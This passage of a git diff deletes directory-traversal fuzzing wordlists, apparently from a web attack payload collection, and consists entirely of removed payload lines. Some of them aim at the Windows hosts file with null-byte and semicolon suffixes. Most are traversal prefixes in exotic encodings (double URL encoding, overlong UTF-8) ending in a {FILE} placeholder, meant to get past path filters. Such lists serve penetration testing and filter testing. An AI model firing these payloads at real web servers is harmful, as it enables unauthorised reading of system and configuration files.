-../../../../windows/system32/drivers/etc/hosts%00index.htm -../../../../windows/system32/drivers/etc/hosts;index.html -../../../../windows/system32/drivers/etc/hosts;index.htm -../../../../../windows/system32/drivers/etc/hosts%00 -../../../../../windows/system32/drivers/etc/hosts%00index.html -../../../../../windows/system32/drivers/etc/hosts%00index.htm -../../../../../windows/system32/drivers/etc/hosts;index.html -../../../../../windows/system32/drivers/etc/hosts;index.htm -../../../../../../windows/system32/drivers/etc/hosts%00 -../../../../../../windows/system32/drivers/etc/hosts%00index.html -../../../../../../windows/system32/drivers/etc/hosts%00index.htm -../../../../../../windows/system32/drivers/etc/hosts;index.html -../../../../../../windows/system32/drivers/etc/hosts;index.htm -..\windows\system32\drivers\etc\hosts%00 -..\windows\system32\drivers\etc\hosts%00index.html -..\windows\system32\drivers\etc\hosts%00index.htm -..\windows\system32\drivers\etc\hosts;index.html -..\windows\system32\drivers\etc\hosts;index.htm -..\..\windows\system32\drivers\etc\hosts%00 -..\..\windows\system32\drivers\etc\hosts%00index.html -..\..\windows\system32\drivers\etc\hosts%00index.htm -..\..\windows\system32\drivers\etc\hosts;index.html -..\..\windows\system32\drivers\etc\hosts;index.htm -..\..\..\windows\system32\drivers\etc\hosts%00 -..\..\..\windows\system32\drivers\etc\hosts%00index.html -..\..\..\windows\system32\drivers\etc\hosts%00index.htm -..\..\..\windows\system32\drivers\etc\hosts;index.html -..\..\..\windows\system32\drivers\etc\hosts;index.htm -..\..\..\..\windows\system32\drivers\etc\hosts%00 -..\..\..\..\windows\system32\drivers\etc\hosts%00index.html -..\..\..\..\windows\system32\drivers\etc\hosts%00index.htm -..\..\..\..\windows\system32\drivers\etc\hosts;index.html -..\..\..\..\windows\system32\drivers\etc\hosts;index.htm -..\..\..\..\..\windows\system32\drivers\etc\hosts%00 -..\..\..\..\..\windows\system32\drivers\etc\hosts%00index.html -..\..\..\..\..\windows\system32\drivers\etc\hosts%00index.htm -..\..\..\..\..\windows\system32\drivers\etc\hosts;index.html -..\..\..\..\..\windows\system32\drivers\etc\hosts;index.htm -..\..\..\..\..\..\windows\system32\drivers\etc\hosts%00 -..\..\..\..\..\..\windows\system32\drivers\etc\hosts%00index.html -..\..\..\..\..\..\windows\system32\drivers\etc\hosts%00index.htm -..\..\..\..\..\..\windows\system32\drivers\etc\hosts;index.html -..\..\..\..\..\..\windows\system32\drivers\etc\hosts;index.htm diff --git a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt deleted file mode 100644 index 5fbaded..0000000 --- a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt +++ /dev/null @@ -1,887 +0,0 @@ -/../{FILE} -/../../{FILE} -/../../../{FILE} -/../../../../{FILE} -/../../../../../{FILE} -/../../../../../../{FILE} -/../../../../../../../{FILE} -/../../../../../../../../{FILE} -/..%2f{FILE} -/..%2f..%2f{FILE} -/..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/%2e%2e/{FILE} -/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/..%252f{FILE} -/..%252f..%252f{FILE} -/..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -/%252e%252e/{FILE} -/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -/%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -/..\{FILE} -/..\..\{FILE} -/..\..\..\{FILE} -/..\..\..\..\{FILE} -/..\..\..\..\..\{FILE} -/..\..\..\..\..\..\{FILE} -/..\..\..\..\..\..\..\{FILE} -/..\..\..\..\..\..\..\..\{FILE} -/..%255c{FILE} -/..%255c..%255c{FILE} -/..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -/..%5c..%5c{FILE} -/..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -/%2e%2e\{FILE} -/%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -/%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/%252e%252e\{FILE} -/%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -/%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -/..%c0%af{FILE} -/..%c0%af..%c0%af{FILE} -/..%c0%af..%c0%af..%c0%af{FILE} -/..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -/%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -/..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -/..%c1%9c{FILE} -/..%c1%9c..%c1%9c{FILE} -/..%c1%9c..%c1%9c..%c1%9c{FILE} -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -/%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -/%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -/..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -/..%%32%66{FILE} -/..%%32%66..%%32%66{FILE} -/..%%32%66..%%32%66..%%32%66{FILE} -/..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -/..%%35%63{FILE} -/..%%35%63..%%35%63{FILE} -/..%%35%63..%%35%63..%%35%63{FILE} -/..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -/%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -/../{FILE} -/../../{FILE} -/../../../{FILE} -/../../../../{FILE} -/../../../../../{FILE} -/../../../../../../{FILE} -/../../../../../../../{FILE} -/../../../../../../../../{FILE} -/..%2f{FILE} -/..%2f..%2f{FILE} -/..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -/%2e%2e/{FILE} -/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} 